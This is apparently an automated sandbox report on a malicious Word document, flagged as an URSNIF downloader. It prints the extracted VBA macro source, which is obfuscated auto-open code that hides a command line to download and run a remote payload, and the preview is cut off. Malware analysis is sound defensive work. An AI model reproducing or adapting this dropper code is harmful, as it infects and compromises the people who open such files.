Verdict: MALICIOUS (Risk Score: 182)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document containing VBA macros. A 'Document_open' macro is present and calls the Shell() function, indicating an attempt to execute arbitrary code when the document is opened. The macro assembles an obfuscated command line, apparently for 'cmd.exe', that downloads and executes a payload. The ClamAV detection 'Doc.Downloader.URSNIF' further supports this assessment.
Heuristics (5)
- ClamAV: Doc.Downloader.URSNIF-6729855-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4571 bytes |

SHA-256 (macros.bas): ae9e885a9fda532742dcdd92fc857ecec4ea2313bff76775622e8f69face7514
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "wnVLunEjJzz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Second "111137847" + "DYQ" + "SM" + "6690"
Second "MiPaPkIwSEFRm" + "406691407" + "ZpitBrkpQIliVM" + "zjdRsJPiJ"
Second "LMjTi" + "HwbjYLXM"
Second "ol" + "95576406"
Second "110675714" + "325246635"
Shell HuRSk + LcDNLGKzcR, CStr(vbHide)
Second "S" + "cztmKGV"
Second "jmza" + "as"
Second "aYch" + "HAOO" + "QH" + "265823861"
End Sub
Attribute VB_Name = "uLqijUnU"
Function HuRSk()
On _
Error _
Resume _
Next
Second "SbvdaqRqNUkAFs" + "IMnq"
Second "OGhU" + "428191817" + "6641" + "5056"
VzTlrdoso = Format(Chr(13 + 8 + 15 + 1 + 62)) + "m" + "d " + "/V/" + Format(Chr(8 + 6 + 10 + 0 + 43)) + Format(Chr(4 + 2 + 4 + 0 + 24)) + "^s^" + "et 3" + "^b" + "S= "
Second "mKz" + "KlorYS"
Second "FmGu" + "99654972" + "iYmTchnXXIDCX" + "8090"
Second "amX" + "K"
Second "zNqD" + "286739490"
uRbmQcDuczj = " ^" + " ^ ^ " + "^ " + " ^ " + "}}{^h" + Format(Chr(13 + 8 + 15 + 1 + 62)) + "ta" + Format(Chr(13 + 8 + 15 + 1 + 62)) + "^}" + ";^kaer" + "b;" + "F"
Second "DU" + "tSbcYbw"
TFfSQuzqpA = "RX$" + " ^m" + "e^t^I" + "^-e^" + "ko" + "vn^I^" + ";)" + "^FR" + "X^" + "$ ^,^D" + "Hh$(^e^" + "li^F" + "^"
Second "1889" + "Dpl" + "120968024" + "UPqfzrRiVfuBcC"
Second "QKmYmUaFViF" + "NUjKpGQJzdKFI"
Second "8251" + "AbCwOrj"
Second "2479" + "MW"
WDoVaTLM = "d^a^ol" + "nw" + "^o" + "^D^." + "^z^hs$^" + "{^" + "y" + "r^t{)Sp" + "o^" + "$ n^" + "i ^D" + "H"
Second "sj" + "240" + "fKiLUwHTM" + "280446805"
Second "GSmYlPUpnzj" + "580" + "WsnQl" + "Vf"
Second "455723977" + "ojc"
TULoFVNUh = "^h" + "$(^h" + Format(Chr(13 + 8 + 15 + 1 + 62)) + "^" + "a" + "er^of" + "^;^'e" + "^x^" + "e" + "^." + "'+p^Mv"
Second "332" + "i" + "XEpBWrsic" + "UCLrTs"
NWKXwEcbz = "$" + "+^'\'^+" + Format(Chr(13 + 8 + 15 + 1 + 62)) + "i^lbu" + "p^:vn" + "e$"
Second "1232" + "432296761"
Second "LlIWAiBfKC" + "9900"
Second "zuMTjfVNq" + "SSQHsNKioRIolt" + "TO" + "OCmSu"
qodJisiqP = "=^FR" + "X^$^;^'" + "005^' ^" + "=^ p" + "Mv$;)" + "'^@" + "^'" + "(t^" + "i" + "l^pS" + "^"
Second "zYuc" + "CY"
Second "bsqv" + "Ff"
Second "9215" + "Qi" + "GjVPTHktZER" + "454384954"
Second "iJNOcY" + "JS" + "NRvw" + "342620897"
jLkTmUvYMVb = ".^'" + "nkt.^1" + "^1g^m" + "^o" + "=^" + "l" + "?p^h^p" + "^" + ".^t^" + "o" + "^ksn^a" + "^p" + "o/^T^T"
Second "402" + "krwMuYDi"
Second "291497204" + "znOvmuHwH" + "JiaNLz" + "449040786"
Second "d" + "5050" + "R" + "4646"
PHAOijSizRs = "R/^m" + "^o" + Format(Chr(13 + 8 + 15 + 1 + 62)) + "." + "^w^qe^" + "w^" + "qe" + "^b^us^" + "ai^" + "yv^" + "h//:^p" + "tth^'" + "^=^Sp" + "^" + "o^$^;tn"
Second "rGBwI" + "h" + "1594" + "3813"
WTSNYOokTJ = "e^i^l" + Format(Chr(8 + 6 + 10 + 0 + 43)) + "b^eW.t" + "eN" + " t" + Format(Chr(13 + 8 + 15 + 1 + 62)) + "e^j" + "bo^-^w"
Second "BQiB" + "55" + "106400059" + "AQJi"
Second "rGmFmCwMIzSdH" + "iGGJVvrSqHQaD"
Second "v" + "JP" + "GRQSjPWLJ" + "8955"
dTVNisidWq = "^en=^z" + "^hs$" + "^ ^l^" + "l^e" + "hsre" + "w^op" + "&&f^or " + "/^L %" + "^F ^in " + "(" + "2^64^;"
Second "K" + "216384363" + "KjbdUOzV" + "156"
Second "4164" + "nbH"
Second "A" + "106865946"
dEOTbii = "^-" + "1^" + ";^0)d^" + "o ^s^" + "et"
Second "zM" + "EYPioMwpQ"
CNaBHioraFo = " h" + Format(Chr(8 + 6 + 10 + 0 + 43)) + "^ux=" + "!h" + Format(Chr(8 + 6 + 10 + 0 + 43)) + "^ux" + "!!3^bS:" + "~" + "%^"
HuRSk = VzTlrdoso + uRbmQcDuczj + TFfSQuzqpA + WDoVaTLM + TULoFVNUh + NWKXwEcbz + qodJisiqP + jLkTmUvYMVb + PHAOijSizRs + WTSNYOokTJ + dTVNisidWq + dEOTbii + CNaBHioraFo
Second "YzTYaijBjuz" + "Ydwwt" + "w" + "137679114"
End Function
Function LcDNLGKzcR()
On _
Error _
Resume _
Next
Second "GBu" + "8664"
VAhGzkaZS = "F," + "1!&&^" + "i^f " + "%^" + "F ^e
... (truncated)
```